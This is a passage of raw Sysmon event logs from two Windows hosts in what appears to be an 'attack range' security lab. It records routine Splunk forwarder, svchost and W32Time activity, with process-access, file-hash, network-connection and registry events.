Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000284717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.157{C8EA50B7-0DAB-6216-9304-000000003802}51645968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:20.048{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F8DA5D1193E1C45705208625D48B5B2,SHA256=E3441001A0228FA4BB9C43EBD7E2C6E0F779CCB38DDC1B337AA82E0E82066BE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:20.086{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64596C99F52F5CF1002C525EA1559789,SHA256=3082D441016FF274743F0565396FB9B73FF5DBF1F5FB4B593E8E9E19C07D550D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.578{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DAD-6216-9604-000000003802}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.578{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.578{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.578{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.578{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.578{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0DAD-6216-9604-000000003802}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.578{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DAD-6216-9604-000000003802}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.579{C8EA50B7-0DAD-6216-9604-000000003802}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000284738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.391{C8EA50B7-0DAD-6216-9504-000000003802}47765596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.188{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D53AE1CDE1C19B7A390FAAA0FF0073B,SHA256=A8B4E2FE6D3B475FBF691A22F9A569C60666D83AC2502FFA369B920A849472C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:21.102{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C075EC087669F795016595D60706069A,SHA256=49826B9A652E3904DBECC2C9BFC0DB180031E74C5CCB69F9BA81914E70154EAA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.078{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DAD-6216-9504-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.078{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.078{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.078{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.078{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.078{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0DAD-6216-9504-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.078{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0DAD-6216-9504-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:21.079{C8EA50B7-0DAD-6216-9504-000000003802}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000213783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:18.526{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51145-false10.0.1.12-8000- 23542300x8000000000000000284748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:22.188{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D3248FC1DADDD538BB66FB8E48BA546,SHA256=2F5560F0DECB56BA52F844EBF3748965CFD35F36F564B186D55C3E1CAD3D10F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:22.133{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A616AF98908CC34CCA349A480E7D2FE7,SHA256=1D84FA2EBE032D3FA17E3963F55307130BCD3D0082A40A639DA74C05A47EC786,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:22.094{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D87EF74F352C87D9EB9C459AF242EE6E,SHA256=F1A9EDADD41B123FF2048EA1AB78453BFDF68012A22DD421DAD90DE0DD06FAE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:23.219{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C7781F16D8F53C687B13A22C1E36FA9,SHA256=0D449E55C07014ADDD3C20329E93FF1BAED512D011018483B7069101404112F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:23.148{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=617AF2FB2CB9501FC72BAF562B79CBC3,SHA256=FCA6ACB27343096DB6F7D2042F9B56EFC4EE7E4B6BF491F857E0F77E0E3C1F50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:24.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BF572AF45565DFBA546184A41D4E86A,SHA256=4CAB7AF6FE56E101A60251811A957E1E50B067116CDDFAC1CA24C38B05D1FBFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:22.713{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53197-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:24.235{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65550F40FB9A03D58BA6500B8B6478A0,SHA256=B587FA26D9C217429E8F0D0EA457F1339A8164AAA37579999E31032E98EF4E30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:25.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5E02B54A3841FEB30F9A508953452E,SHA256=FBDFDC6035FDA9EC6042C45B1246289067076E7941CD1A69B7631200577EA9FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:25.250{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50108D0E27129EA7D13E81F951853105,SHA256=CF40D3459ED64172C2912FB873108268F4EFFCB5ABDFB7C1E78496DE0499B646,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000284763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000284762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x006fc0b4) 13241300x8000000000000000284761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d82898-0x8c61bf09) 13241300x8000000000000000284760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:34:26.625{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a0-0xee262709) 13241300x8000000000000000284759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 